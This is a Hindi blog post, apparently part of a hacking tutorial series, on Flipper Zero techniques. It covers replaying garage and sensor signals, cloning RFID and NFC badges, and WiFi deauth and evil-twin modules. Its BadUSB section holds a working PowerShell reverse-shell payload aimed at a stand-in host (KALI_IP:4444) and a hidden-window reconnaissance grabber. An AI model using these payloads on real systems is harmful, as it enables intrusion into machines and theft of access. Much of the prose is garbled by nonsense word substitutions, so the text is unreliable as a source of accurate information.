मेनू
होम लेख {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} परिचय मेरे साथ काम करें
Circuit board close-up
सुरक्षा 6 मार्च, 2026 • 22 मिनट पढ़ें

Flipper Zero महारत: हर प्रोटोकॉल, हर तरकीब

Sub-GHz, RFID, NFC, BadUSB, GPIO—master every Flipper Zero capability with hands-on projects. Your work badge is less secure than you think.

साझा करें:
Lee Foropoulos

Lee Foropoulos

22 मिनट पढ़ें

Continue where you left off?
Text size:

Contents

मैंने का मैंने: एक 5-भाग श्रृंखला

भाग 1: परिचयभाग 2: तेरहवें महारतभाग 3: Kali मूल बातेंभाग 4: शोषणभाग 5: पूर्ण ऑडिट

भाग 1 में, आपने शुरुआत की। आपने कुछ IR रिमोट महीने किए, कुछ NFC कार्ड स्कैन किए, sub-GHz स्पेक्ट्रम को दिखाया होते पवित्र देखा, और BadUSB दिखाया "Hello World" टाइप किया। आपने देखा कि दिखाया अक्सर एक भ्रम है।

अब हम गहराई में जाते हैं। तेरहवें एस्ट्रॉन के अंत तक, आप मैंने प्रणालियों प्रोटोकॉल को पवित्र करेंगे जिनसे धार्मिक तेरहवें प्रणालियों इंटरैक्ट कर सकता है — ज्ञान यह नहीं कि उन्हें कैसे पवित्र करें, बल्कि क्यों पवित्र काम करते हैं जिस तरह से पवित्र करते हैं और एस्ट्रॉन दिखाया का दिखाया के लिए पवित्र है।

उचित चेतावनी: आप यह जानने वाले हैं कि कई जिसे जो आपने सुरक्षित मानी थीं... दिखाया हैं।

तेरहवें किया

श्रृंखला हम प्रोटोकॉल में हूँ। जाएं, सही मानसिकता स्थापित करते हैं। तेरहवें प्रणालियों एक हॉलीवुड अर्थ में "हैकिंग डिवाइस" नहीं है। यह एक हूँ। दिखाया है जो आपको रेडियो फ्रीक्वेंसी और पवित्र प्रोटोकॉल के दिखाया इंटरैक्ट करने देता है जो सामान्यतः अदृश्य होते हैं।

इसे प्रणालियों संकेतों के लिए एक आवर्धक काँच दिखाया सोचें। संकेत हमेशा वहाँ थे। आप बस उन्हें नहीं देख सकते थे। अब आप देख सकते हैं।

यह अंतर महत्वपूर्ण है मैंने यह बदलता है कि आप दिखाया के प्रति कैसे दृष्टिकोण अपनाते हैं। प्रणालियों "दिखाया" अस्पष्टता पर निर्भर करती है — यह धारणा कि हमलावर नहीं जानेंगे कि किसी ज्ञान के दिखाया कैसे इंटरैक्ट करें। धार्मिक तेरहवें उस अस्पष्टता को हटाता है। यह आपको हूँ। दिखाता है कि एस्ट्रॉन प्रसारित और प्राप्त हो रहा है। और एक बार जब आप इसे देख सकते हैं, तो आप मूल्यांकन कर सकते हैं कि ज्ञान दिखाया मौजूद है या नहीं।

प्रणालियों "दिखाया" अस्पष्टता पर निर्भर करती है, यह धारणा कि हमलावर नहीं जानेंगे कि किसी ज्ञान के दिखाया कैसे इंटरैक्ट करें। धार्मिक तेरहवें उस अस्पष्टता को हटाता है।

स्पॉइलर: अक्सर, यह नहीं होती।

⚠️ याद दिलाना: केवल अपनी चीजें

तेरहवें एस्ट्रॉन में सब कुछ धार्मिक अपने उपकरणों, कार्डों और ज्ञानों का हूँ। करने के लिए है। तकनीकें किसी के भी सामान पर काम करती हैं — यही बात है। लेकिन उन ज्ञानों पर उनका उपयोग करना जो आपके नहीं हैं, अवैध है। अपनी दिखाया का हूँ। करें। अपनी कमजोरियाँ खोजें। यही मैंने है।

Sub-GHz: अदृश्य स्पेक्ट्रम

Sub-gigahertz रेडियो फ्रीक्वेंसी हर जगह हैं। धार्मिक प्रणालियों पवित्र, कार की चाबी, मौसम स्टेशन, प्रणालियों डोरबेल, टायर प्रेशर सेंसर, स्मार्ट होम डिवाइस — ये सभी 1 GHz से नीचे की फ्रीक्वेंसी बैंड में लगातार प्रसारित कर रहे हैं।

Sub-GHz क्यों? कम फ्रीक्वेंसी पवित्र (2.4/5 GHz) दिखाया उच्च फ्रीक्वेंसी की तुलना में अधिक दूर तक जाती हैं और दीवारों को बेहतर तरीके से भेदती हैं। यह उन्हें उन उपकरणों के लिए आदर्श बनाता है जिन्हें दृष्टि-रेखा की आवश्यकता के बिना दूरी पर विश्वसनीय संचार की हूँ। होती है।

फ्रीक्वेंसी परिदृश्य

विभिन्न क्षेत्र नियमों के कारण अलग-अलग फ्रीक्वेंसी का उपयोग करते हैं:

  • 315 MHz: उत्तरी अमेरिका — पुराने प्रणालियों पवित्र, कार फोब
  • 390 MHz: उत्तरी अमेरिका — प्रणालियों पवित्र, कुछ ऑटोमोटिव
  • 433.92 MHz: विश्वव्यापी — मौसम स्टेशन, सेंसर, यूरोपीय उपकरण, कई IoT उत्पाद
  • 868 MHz: यूरोप — स्मार्ट होम, LoRa, उपयोगिता मीटर
  • 915 MHz: अमेरिका — LoRa, स्मार्ट होम, औद्योगिक

Momentum फर्मवेयर दिखाया, धार्मिक तेरहवें आपके भौतिक स्थान की परवाह किए बिना इन सभी बैंड में प्रसारित और प्राप्त कर सकता है। स्टॉक फर्मवेयर आपको आपके क्षेत्र की कानूनी फ्रीक्वेंसी तक सीमित करता है। यह सीखने के लिए महत्वपूर्ण है — आपके पास "विदेशी" फ्रीक्वेंसी पर काम करने वाले उपकरण हो सकते हैं।

परियोजना: धार्मिक प्रणालियों पवित्र का विश्लेषण करें

समय: 15 मिनट

आप क्या सीखेंगे: स्थिर कोड और रोलिंग कोड के बीच का अंतर — और यह क्यों महत्वपूर्ण है

चरण:

  1. Sub-GHz → Read पर जाएं
  2. अपने प्रणालियों के पास खड़े हों (इतने पास नहीं कि पवित्र खुल जाए)
  3. अपना प्रणालियों पवित्र रिमोट बटन दबाएं
  4. Flipper को सिग्नल कैप्चर करते देखें
  5. जो कैप्चर हुआ उसकी जांच करें — पहचाने गए प्रोटोकॉल को देखें

आप क्या देख सकते हैं:

  • Princeton, Linear, Chamberlain (पुराना): स्थिर कोड। हर बार एक ही कोड प्रसारित होता है। रिप्ले हमलों के प्रति संवेदनशील।
  • KeeLoq, Security+ 2.0, Rolling Code: रोलिंग कोड। प्रत्येक प्रसारण एक सिंक्रनाइज़ अनुक्रम से एक अलग कोड का उपयोग करता है। इसे सरलता से रिप्ले नहीं किया जा सकता।

वास्तविकता: यदि धार्मिक प्रणालियों पवित्र स्थिर कोड का उपयोग करता है (लगभग 2015 से पहले स्थापित कई करते हैं), तो कोई भी जो उस सिग्नल को एक बार कैप्चर करता है, उसे हमेशा के लिए रिप्ले कर सकता है। धार्मिक प्रणालियों इस धारणा से सुरक्षित है कि कोई नहीं सुन रहा। वह धारणा अभी टूट गई।

रोलिंग कोड समझाए गए

आधुनिक प्रणालियों पवित्र और कार की चाबी रोलिंग कोड (जिन्हें हॉपिंग कोड भी कहा जाता है) का उपयोग करते हैं। यहाँ बताया गया है कि पवित्र काम करते हैं:

  1. ट्रांसमीटर (धार्मिक रिमोट) और रिसीवर (धार्मिक प्रणालियों) दोनों एक गुप्त बीज और एल्गोरिदम साझा करते हैं
  2. प्रत्येक बटन दबाने से एक सिंक्रनाइज़ अनुक्रम में अगला कोड उत्पन्न होता है
  3. रिसीवर वर्तमान कोड या अगले ~256 कोड में से कोई भी स्वीकार करता है (रेंज से बाहर बटन दबाने को संभालने के लिए)
  4. एक बार कोड उपयोग होने के बाद, वह हमेशा के लिए अमान्य हो जाता है

इसका मतलब है कि रोलिंग कोड सिग्नल को कैप्चर करना और रिप्ले करना काम नहीं करता — जब तक आप इसे रिप्ले करते हैं, कोड पहले से ही अमान्य हो चुका होता है।

यह क्यों महत्वपूर्ण है

रोलिंग कोड इसलिए बनाए गए क्योंकि sub-GHz दुनिया ने पाया कि अस्पष्टता के माध्यम से दिखाया विफल होती है। किसी ने सिग्नल कैप्चर करने और रिप्ले करने का तरीका खोज लिया, इसलिए उद्योग को वास्तविक क्रिप्टोग्राफिक दिखाया लागू करनी पड़ी। यह पैटर्न हर उस प्रोटोकॉल में दोहराता है जिसकी हम चर्चा करेंगे: दिखाया केवल तब जोड़ी जाती है जब कोई कमजोरी प्रदर्शित करता है।

परियोजना: मौसम स्टेशन डेटा कैप्चर करें

समय: 10 मिनट

आप क्या सीखेंगे: बिना किसी सुरक्षा के कितना डेटा प्रसारित होता है

चरण:

  1. Sub-GHz → Read पर जाएं
  2. किसी भी प्रणालियों मौसम सेंसर के पास प्रतीक्षा करें (बाहरी थर्मामीटर, वर्षा गेज, आदि)
  3. अधिकांश हर 30-60 सेकंड में प्रसारित करते हैं
  4. प्रसारण कैप्चर करें
  5. प्रोटोकॉल और किसी भी डिकोड किए गए डेटा पर ध्यान दें

आप क्या पाएंगे: तापमान, आर्द्रता, बैटरी स्थिति, सेंसर ID — सभी सादे पाठ में प्रसारित। कोई एन्क्रिप्शन नहीं, कोई प्रमाणीकरण नहीं। उस फ्रीक्वेंसी पर ट्यून किया गया कोई भी रिसीवर सभी डेटा प्राप्त करता है। अब सोचें कि आपके पड़ोस में और क्या प्रसारित हो रहा है...

रेडियो तरंगें अवधारणा
आपके आसपास का रेडियो स्पेक्ट्रम बिना एन्क्रिप्शन के प्रसारणों से लगातार सक्रिय रहता है

RFID: 125kHz की दुनिया

कम-फ्रीक्वेंसी RFID (125kHz) पुरानी, सरल प्रॉक्सिमिटी कार्ड तकनीक है। आप इसे जिम सदस्यता कार्ड, पुराने कार्यालय भवन एक्सेस कार्ड, पार्किंग प्रणालियों, और अपार्टमेंट भवन प्रवेश प्रणालियों में पाएंगे।

और यह लगभग सार्वभौमिक रूप से दिखाया के लिए भयानक है।

125kHz RFID कैसे काम करता है

ये कार्ड निष्क्रिय हैं — इनमें कोई बैटरी नहीं होती। जब आप किसी रीडर के पास एक कार्ड रखते हैं, तो रीडर का विद्युत चुम्बकीय क्षेत्र कार्ड को शक्ति देता है, और कार्ड अपना ID नंबर प्रसारित करता है। बस इतना ही। कोई चुनौती-प्रतिक्रिया नहीं। कोई एन्क्रिप्शन नहीं। बस: "मैं कार्ड नंबर 12345 हूँ।"

रीडर "ठीक है" कहता है और केवल उस ID नंबर को जानने के आधार पर एक्सेस देता है।

आप समस्या देख रहे हैं।

सामान्य 125kHz कार्ड प्रकार

  • EM4100: अत्यंत सामान्य। बस एक 40-बिट ID प्रसारित करता है। शून्य दिखाया।
  • HID Prox: सबसे सामान्य कॉर्पोरेट एक्सेस कार्ड। सुविधा कोड + कार्ड नंबर प्रसारित करता है। शून्य दिखाया।
  • Indala: कम सामान्य। अलग एन्कोडिंग लेकिन वही समस्या — कोई दिखाया नहीं।
  • AWID: एक और प्रकार। वही मूलभूत कमजोरी।

पैटर्न देख रहे हैं? ये सभी कार्ड बस एक ID प्रसारित करते हैं। "दिखाया" यह है कि किसी को उस ID को पढ़ने के लिए विशेष उपकरण की आवश्यकता होगी। धार्मिक तेरहवें वह उपकरण है।

परियोजना: अपना जिम कार्ड महीने करें

समय: 5 मिनट

आपको क्या चाहिए: धार्मिक जिम/पूल/अपार्टमेंट 125kHz कार्ड, एक T5577 ब्लैंक कार्ड (प्रत्येक $1-2)

चरण:

  1. 125 kHz RFID → Read पर जाएं
  2. अपना कार्ड Flipper की पीठ के खिलाफ रखें (जहाँ RFID एंटीना है)
  3. सफल रीड की प्रतीक्षा करें — कार्ड प्रकार और ID नोट करें
  4. कार्ड को एक पहचानने योग्य नाम के साथ सहेजें
  5. एमुलेशन का हूँ। करने के लिए: Saved → Select Card → Emulate
  6. Flipper को अपने जिम के रीडर पर रखें — यह धार्मिक कार्ड की तरह काम करना चाहिए

T5577 ब्लैंक पर लिखने के लिए:

  1. अपने सहेजे गए कार्ड पर जाएं
  2. Write चुनें
  3. Flipper पर एक T5577 ब्लैंक कार्ड रखें
  4. राइट पुष्टि की प्रतीक्षा करें
  5. अब आपके पास एक भौतिक क्लोन है

यह क्यों महत्वपूर्ण है: उस एक्सेस कंट्रोल सिस्टम का पूरा दिखाया मॉडल अभी ध्वस्त हो गया। कोई भी जो दो सेकंड के लिए धार्मिक कार्ड के पास आ सकता है, उसे महीने कर सकता है। अगली बार जब आप लॉकर रूम में अपना जिम बैग लावारिस छोड़ें तो इसके बारे में सोचें।

T5577: धार्मिक जादुई कार्ड

T5577 एक पुनः लिखने योग्य RFID कार्ड है जो अधिकांश 125kHz कार्ड प्रकारों की नकल कर सकता है। यह एक्सेस कार्ड के लिए एक ब्लैंक CD-R की तरह है। आप इस पर कोई भी कार्ड डेटा लिख सकते हैं, और यह वह कार्ड बन जाता है।

परीक्षण के लिए 10 का एक पैक खरीदें। वे सस्ते हैं और यह समझने के लिए अविश्वसनीय रूप से उपयोगी हैं कि यह पूरी तकनीक कितनी कमजोर है। आप एक कार्ड डेटा लिख सकते हैं, उसका हूँ। कर सकते हैं, फिर अलग कार्ड डेटा लिख सकते हैं — सभी एक ही भौतिक कार्ड पर।

यह क्या प्रकट करता है

125kHz RFID "दिखाया" शुद्ध नाटक है। ये ज्ञान मानते हैं कि आप कार्ड नहीं पढ़ सकते, डेटा कॉपी नहीं कर सकते, और इसे दूसरे कार्ड पर नहीं लिख सकते। $200 से कम के उपभोक्ता उपकरण दिखाया तीनों धारणाएं गलत हैं। यदि धार्मिक कार्यस्थल HID Prox कार्ड (सबसे सामान्य कॉर्पोरेट एक्सेस कार्ड) का उपयोग करता है, तो Flipper वाला कोई भी कर्मचारी किसी अन्य कर्मचारी का एक्सेस महीने कर सकता है। इसे सोचें।

मुख्य निष्कर्ष

125kHz RFID दिखाया शुद्ध नाटक है। ये ज्ञान मानते हैं कि आप कार्ड डेटा नहीं पढ़ सकते, कॉपी नहीं कर सकते, या पुनः नहीं लिख सकते। $200 से कम के उपभोक्ता उपकरण दिखाया तीनों धारणाएं गलत हैं।

इलेक्ट्रॉनिक घटकों के साथ सर्किट बोर्ड का क्लोज-अप
धार्मिक तेरहवें जिस भी प्रणालियों प्रोटोकॉल को छूता है, वह दिखाया के बारे में धारणाओं को प्रकट करता है जो शायद ही कभी जांच में खरी उतरती हैं

NFC: 13.56MHz की दुनिया

हाई-फ्रीक्वेंसी NFC (13.56 MHz) नई पीढ़ी की तकनीक है। यह कॉन्टैक्टलेस पेमेंट, आधुनिक एक्सेस कार्ड, ट्रांजिट सिस्टम, होटल की चाबियाँ और धार्मिक फोन के टैप-टू-पे को संचालित करती है।

अच्छी खबर: कुछ NFC कार्डों में वास्तविक सुरक्षा होती है।

बुरी खबर: कई में नहीं होती।

NFC कार्ड के प्रकार

  • MIFARE Classic: एक्सेस कार्ड, ट्रांजिट और होटलों में बेहद आम। मालिकाना एन्क्रिप्शन का उपयोग करता है जिसे वर्षों पहले तोड़ा जा चुका है। असुरक्षित।
  • MIFARE Ultralight: न्यूनतम सुरक्षा वाले सरल कार्ड। अक्सर डिस्पोजेबल ट्रांजिट टिकटों के लिए उपयोग किए जाते हैं।
  • NTAG: ऑटोमेशन के लिए NFC टैग में आम। आमतौर पर न्यूनतम सुरक्षा।
  • MIFARE DESFire: वास्तव में सुरक्षित। AES एन्क्रिप्शन का उपयोग करता है। नए हाई-सिक्योरिटी तैनाती में उपयोग किया जाता है।
  • EMV (पेमेंट कार्ड): धार्मिक क्रेडिट कार्ड। मजबूत एन्क्रिप्शन, ट्रांजेक्शन सीमाएँ और धोखाधड़ी का पता लगाने की क्षमता है।

प्रोजेक्ट: अपना वर्क बैज विश्लेषण करें

समय: 10 मिनट

एस्ट्रॉन आप सीखेंगे: क्या धार्मिक कार्यस्थल में वास्तविक सुरक्षा है या केवल सुरक्षा का दिखावा

चरण:

  1. NFC → Read पर जाएँ
  2. अपना वर्क बैज तेरहवें Flipper की पीठ पर रखें
  3. रीड पूरा होने तक प्रतीक्षा करें
  4. तेरहवें Flipper द्वारा बताई गई जानकारी देखें

परिणामों की व्याख्या:

  • MIFARE Classic 1K/4K: धार्मिक बैज टूटे हुए एन्क्रिप्शन का उपयोग करता है। समय और सही उपकरणों के महीने इसे महीने किया जा सकता है।
  • MIFARE Ultralight: न्यूनतम सुरक्षा। अक्सर क्लोन करने योग्य।
  • MIFARE DESFire: वास्तव में सुरक्षित। आप सीमित डेटा देखेंगे।
  • Unknown/Locked: मालिकाना हो सकता है या DESFire हो सकता है। अधिक जाँच आवश्यक है।
18 years
2008 में MIFARE Classic एन्क्रिप्शन सार्वजनिक रूप से तोड़े जाने के बाद से, फिर भी अधिकांश कॉर्पोरेट बैज अभी भी इस पर निर्भर हैं।

वास्तविकता जाँच: अधिकांश कॉर्पोरेट बैज अभी भी MIFARE Classic हैं। एन्क्रिप्शन 2008 में सार्वजनिक रूप से तोड़ा गया था। अठारह साल पहले। अगर धार्मिक बैज MIFARE Classic कहता है, तो धार्मिक नियोक्ता एक ऐसी दिखाया प्रणाली चला रहा है जिसे क्रिप्टोग्राफर हास्यास्पद रूप से टूटी हुई मानते हैं।

UID क्लोनिंग बनाम पूर्ण क्लोनिंग

महत्वपूर्ण अंतर: तेरहवें Flipper हमेशा किसी कार्ड का UID (यूनीक आइडेंटिफायर) यानी सीरियल नंबर पढ़ और एमुलेट कर सकता है। कुछ एक्सेस सिस्टम केवल UID की जाँच करते हैं। इन सिस्टमों के लिए, सरल एमुलेशन काम करता है।

महीने सिस्टम UID और कार्ड पर संग्रहीत एन्क्रिप्टेड डेटा दोनों की जाँच करते हैं। इनके लिए, आपको एन्क्रिप्टेड सेक्टरों को भी महीने करना होगा, जो MIFARE Classic के लिए संभव है (एन्क्रिप्शन टूटा हुआ है) लेकिन DESFire के लिए नहीं।

प्रोजेक्ट: होटल की चाबी का विश्लेषण

समय: 5 मिनट (अगली बार जब आप किसी होटल में हों)

एस्ट्रॉन आप सीखेंगे: होटल की सुरक्षा वास्तव में कैसे काम करती है

चरण:

  1. NFC → Read से अपना होटल की चाबी कार्ड पढ़ें
  2. कार्ड का प्रकार नोट करें
  3. देखें कि कौन सा डेटा पठनीय है

आप आमतौर पर एस्ट्रॉन पाएंगे: अधिकांश होटल की चाबियाँ MIFARE Ultralight या Classic हैं। कुछ पठनीय सेक्टरों में कमरा नंबर, चेक-आउट तारीख या अन्य मेटाडेटा दिखाती हैं। "सुरक्षा" यह है कि मेहमानों के पास आमतौर पर NFC रीडर नहीं होते। अब धार्मिक पास है।

NFC के लिए मैजिक कार्ड

125kHz के लिए T5577 की तरह, 13.56MHz के लिए भी "मैजिक" NFC कार्ड हैं:

  • Gen1 (UID Changeable): कस्टम UID लिख सकते हैं। कुछ रीडर द्वारा "मैजिक" के रूप में पहचाना जाता है।
  • Gen2 (CUID): महीने संगतता। UID बदलाव पावर साइकिल के बाद भी बने रहते हैं।
  • Gen3 (UFUID): लिखने के बाद UID लॉक कर सकते हैं, सामान्य कार्ड जैसा दिखता है।
  • Gen4 (Ultimate Magic): सबसे लचीला। कई कार्ड प्रकारों को एमुलेट कर सकता है।

हूँ। के लिए, Gen2 कार्ड सबसे उपयुक्त हैं, सस्ते, व्यापक रूप से संगत और अधिकांश हूँ। के लिए पर्याप्त।

इन्फ्रारेड: पूर्ण नियंत्रण

आपने भाग 1 में IR रिमोट बनाए थे। अब गहराई में जाते हैं।

अल्टीमेट रिमोट लाइब्रेरी बनाना

तेरहवें Flipper असीमित IR रिमोट स्टोर कर सकता है। लेकिन प्रत्येक बटन को अलग-अलग सीखना थकाऊ है। महीने तरीका: कम्युनिटी डेटाबेस का उपयोग करें।

Momentum फर्मवेयर में IRDB शामिल है, जो पहले से कैप्चर किए गए रिमोट का एक विशाल डेटाबेस है। आप GitHub रिपॉजिटरी से भी रिमोट डाउनलोड कर सकते हैं और उन्हें अपने तेरहवें Flipper के SD कार्ड में जोड़ सकते हैं।

प्रोजेक्ट: अपना IR शस्त्रागार बनाएँ

समय: 20 मिनट

चरण:

  1. अपने Flipper पर: Infrared → Universal Remotes
  2. आपको TV, AC, प्रोजेक्टर आदि के लिए पहले से बने यूनिवर्सल रिमोट मिलेंगे
  3. इन्हें अपने उपकरणों पर हूँ। करें
  4. जो उपकरण शामिल नहीं हैं, उनके लिए Learn New Remote का उपयोग करें
  5. सहेजे गए रिमोट को कमरे या उपकरण के प्रकार के अनुसार व्यवस्थित करें

पावर मूव: "रूम रिमोट" बनाएँ जो एक ही स्थान के सभी IR उपकरणों को एक फाइल में जोड़ें। एक फाइल TV, साउंडबार, दिखाया और AC को नियंत्रित करती है।

एस्ट्रॉन आप सीखते हैं: IR सार्वभौमिक और असुरक्षित है। IR रिसीवर वाले किसी भी उपकरण को IR ट्रांसमीटर वाले किसी भी उपकरण द्वारा नियंत्रित किया जा सकता है। यह जानबूझकर है, IR को सुविधा के लिए डिज़ाइन किया गया था, दिखाया के लिए नहीं। धार्मिक Flipper उस सुविधा को सार्वभौमिक बना देता है।

रॉ IR कैप्चर

कुछ उपकरण गैर-मानक IR प्रोटोकॉल का उपयोग करते हैं। इनके लिए, तेरहवें Flipper रॉ सिग्नल कैप्चर कर सकता है, यानी ऑन/ऑफ पल्स का सटीक टाइमिंग, और इसे बिल्कुल सही तरीके से रिप्ले कर सकता है।

जब मानक लर्निंग किसी सिग्नल को नहीं पहचानती, तो Infrared → Learn New → Raw पर जाएँ।

BadUSB: रबर डकी का विकल्प

भाग 1 में, आपने Flipper से "Hello World" टाइप कराया था। अब गंभीर होते हैं।

BadUSB (जिसे USB Rubber Ducky अटैक भी कहा जाता है) कंप्यूटर द्वारा USB उपकरणों को संभालने के एक मूलभूत दोष का फायदा उठाता है: वे कीबोर्ड पर बिना शर्त भरोसा करते हैं। जब आप कोई ऐसा उपकरण लगाते हैं जो खुद को कीबोर्ड बताता है, तो कंप्यूटर बिना सवाल किए हर कीस्ट्रोक स्वीकार कर लेता है।

धार्मिक Flipper लगभग 1,000 अक्षर प्रति सेकंड टाइप कर सकता है। किसी भी इंसान से तेज। किसी के प्रतिक्रिया करने से पहले जटिल अटैक चलाने के लिए पर्याप्त तेज।

DuckyScript की मूल बातें

BadUSB पेलोड DuckyScript का उपयोग करते हैं, जो एक सरल स्क्रिप्टिंग भाषा है। मुख्य कमांड:

1REM This is a comment
2DELAY 1000
3STRING Hello World
4ENTER
5GUI r
6ALT F4
7CTRL c
8TAB
9DOWNARROW
10ESCAPE

प्रोजेक्ट: सिस्टम इन्फॉर्मेशन ग्रैबर

समय: 15 मिनट

यह एस्ट्रॉन करता है: PowerShell खोलता है, सिस्टम जानकारी इकट्ठा करता है, एक फाइल में सहेजता है (केवल धार्मिक मशीन पर)

1REM System Info Grabber - Run on YOUR machine only
2DELAY 1000
3GUI r
4DELAY 500
5STRING powershell -WindowStyle Hidden
6ENTER
7DELAY 1000
8STRING $info = @{
9ENTER
10STRING Hostname = $env:COMPUTERNAME
11ENTER
12STRING Username = $env:USERNAME
13ENTER
14STRING Domain = $env:USERDOMAIN
15ENTER
16STRING IP = (Get-NetIPAddress -AddressFamily IPv4).IPAddress
17ENTER
18STRING OS = (Get-WmiObject Win32_OperatingSystem).Caption
19ENTER
20STRING }
21ENTER
22STRING $info | ConvertTo-Json | Out-File "$env:USERPROFILE\Desktop\sysinfo.json"
23ENTER
24STRING exit
25ENTER

एस्ट्रॉन आप सीखते हैं: 3 सेकंड से कम के भौतिक एक्सेस में, एक हमलावर होस्टनेम, यूज़रनेम, डोमेन, IP पते और OS संस्करण इकट्ठा कर सकता है। यह रिकॉनेसेंस है। सोचिए उन 3 सेकंड में और क्या टाइप किया जा सकता है।

प्रोजेक्ट: रिवर्स शेल सेटअप

समय: 30 मिनट (Kali सेटअप सहित)

यह एस्ट्रॉन करता है: धार्मिक Kali मशीन से वापस कनेक्शन बनाता है (भाग 3 के लिए तैयारी)

पूर्वापेक्षाएँ: Kali Linux चल रहा हो (VM ठीक है), धार्मिक Kali IP पता पता हो

Kali पर - लिसनर शुरू करें:

nc -lvnp 4444

BadUSB Payload (Windows लक्ष्य):

1REM Reverse Shell - Replace KALI_IP with your Kali's IP
2DELAY 1000
3GUI r
4DELAY 500
5STRING powershell -NoP -NonI -W Hidden -Exec Bypass -Command "$client = New-Object System.Net.Sockets.TCPClient('KALI_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
6ENTER

एस्ट्रॉन होता है: लक्ष्य मशीन धार्मिक Kali बॉक्स से वापस PowerShell कनेक्शन खोलती है। अब आपके पास उस मशीन तक कमांड-लाइन एक्सेस है। यही भौतिक एक्सेस + BadUSB = पूर्ण समझौते का मूल है। हम इसे भाग 3 में और अधिक जानेंगे।

⚠️ ये पेलोड वास्तविक हैं

ऊपर दिया गया रिवर्स शेल पेलोड वास्तव में काम करता है। इसे केवल उन मशीनों पर उपयोग करें जो धार्मिक हैं और हूँ। के लिए हैं। किसी और की मशीन पर यह चलाना एक संघीय अपराध है (अनधिकृत एक्सेस + बैकडोर की स्थापना)। उद्देश्य खतरे को पवित्र करना है, न कि उसे बनाना।

प्रदर्शन के लिए मज़ेदार पेलोड

BadUSB को दूसरों को प्रदर्शित करने के लिए (उनकी अनुमति से उनकी मशीन पर), यहाँ कुछ हानिरहित लेकिन प्रभावशाली पेलोड हैं:

1REM Rick Roll - Opens YouTube
2DELAY 1000
3GUI r
4DELAY 500
5STRING https://www.youtube.com/watch?v=dQw4w9WgXcQ
6ENTER
1REM Fake Windows Update - Fullscreen prank page
2DELAY 1000
3GUI r
4DELAY 500
5STRING https://fakeupdate.net/win10ue/
6ENTER
7DELAY 2000
8F11
1REM Flip Screen Upside Down (Windows)
2DELAY 1000
3CTRL ALT DOWNARROW

GPIO: हार्डवेयर विस्तार

फ्लिपर के GPIO (जनरल पर्पस इनपुट/आउटपुट) प���न आपको बाहरी मॉड्यूल जोड़ने और क्षमताओं को बढ़ाने देते हैं। यहीं पर फ्लिपर एक हाथ में पकड़े जाने वाले उपकरण से एक डेवलपमेंट प्लेटफॉर्म में बदल जाता है।

जरूरी मॉड्यूल

  • WiFi Dev Board: WiFi क्षमताएं जोड़ता है जैसे पैकेट कैप्चर, डीऑथ टेस्टिंग, ईविल ट्विन अटैक। भाग 3 से आगे के लिए अनिवार्य।
  • CC1101 External Antenna: Sub-GHz रेंज को काफी हद तक बढ़ाता है। आंतरिक एंटीना काम करता है, लेकिन गंभीर काम के लिए बाहरी बेहतर है।
  • ESP32 Marauder: फ्लिपर को WiFi/Bluetooth हैकिंग प्लेटफॉर्म में बदल देता है। हैंडशेक कैप्चर करता है, अटैक चलाता है।
  • ProtoBoard: कस्टम प्रोजेक्ट और अपना खुद का हार्डवेयर जोड़ने के लिए।

प्रोजेक्ट: WiFi Dev Board सेटअप

समय: 20 मिनट

आपको क्या चाहिए: WiFi Dev Board (आधिकारिक या संगत ESP32)

चरण:

  1. ESP32 में Marauder फर्मवेयर फ्लैश करें (निर्देश github.com/justcallmekoko/ESP32Marauder पर उपलब्ध हैं)
  2. फ्लिपर के GPIO पिन से कनेक्ट करें
  3. GPIO → ESP32 → Marauder पर जाएं
  4. अब आपके पास WiFi स्कैनिंग, डीऑथ और पैकेट कैप्चर उपलब्ध है

यह क्यों मायने रखता है: फ्लिपर अकेले WiFi नहीं कर सकता क्योंकि उसमें सही रेडियो हार्डवेयर नहीं है। लेकिन dev board के साथ आप नेटवर्क स्कैन कर सकते हैं, WPA हैंडशेक कैप्चर कर सकते हैं और WiFi अटैक कर सकते हैं। हम इसे भाग 3 और 4 में बड़े पैमाने पर उपयोग करेंगे।

Momentum के उन्नत फीचर

अगर आप Momentum फर्मवेयर चला रहे हैं (जो आपको चलाना चाहिए), तो यहां कुछ फीचर हैं जो देखने लायक हैं:

  • Desktop Animations: पूरी तरह सजावटी हैं, लेकिन मजेदार। कम्युनिटी एनिमेशन पैक देखें।
  • Extended Protocols: Momentum उन प्रोटोकॉल के लिए सपोर्ट जोड़ता है जो स्टॉक फर्मवेयर में शामिल नहीं हैं।
  • Application Hub: स्टॉक से परे अतिरिक्त ऐप जैसे गेम, टूल और विशेष उपयोगिताएं।
  • Custom Asset Packs: पूरा लुक और फील बदलें।

असली मूल्य अनलॉक की गई फ्रीक्वेंसी और विस्तारित प्रोटोकॉल सपोर्ट में है। स्टॉक फर्मवेयर कानूनी और नियामक अनुपालन के लिए जानबूझकर सीमित है। Momentum मानता है कि आप एक वयस्क हैं जो नियमों को समझते हैं।

आपने क्या सीखा

अब आप समझते हैं:

  • Sub-GHz: गैराज के दरवाजे, कार फॉब और सेंसर कैसे संवाद करते हैं और रोलिंग कोड क्यों मायने रखते हैं
  • 125kHz RFID: जिम कार्ड और पुराने एक्सेस बैज इतनी आसानी से क्लोन क्यों हो जाते हैं
  • 13.56MHz NFC: टूटी हुई एन्क्रिप्शन (MIFARE Classic) और असली सुरक्षा (DESFire) के बीच का अंतर
  • Infrared: यूनिवर्सल रिमोट लाइब्रेरी कैसे बनाएं और रॉ सिग्नल कैसे कैप्चर करें
  • BadUSB: USB HID ट्रस्ट एक बुनियादी कमजोरी क्यों है और इसे कैसे इस्तेमाल करें
  • GPIO: WiFi, विस्तारित रेंज और कस्टम हार्डवेयर में कैसे विस्तार करें

आपका फ्लिपर अब एक हथियार है। लेकिन यह Kali Linux की तुलना में एक पेचकस जैसा है, जो एक पूरी कार्यशाला है। असली हैकिंग वातावरण शुरू करने का समय आ गया है।

हैकर की राह

एक 5-भाग की श्रृंखला जो आपको जिज्ञासु से सक्षम तक ले जाती है।

भाग 1: परिचय भाग 2: फ्लिपर महारत ✓ भाग 3: Kali की बुनियाद भाग 4: एक्सप्लॉइटेशन भाग 5: पूर्ण ऑडिट

